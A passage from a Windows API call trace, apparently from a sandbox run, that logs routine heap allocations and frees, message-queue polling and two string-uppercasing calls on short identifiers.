(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0206.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0206.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.275] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.275] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.276] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.276] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.276] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.278] 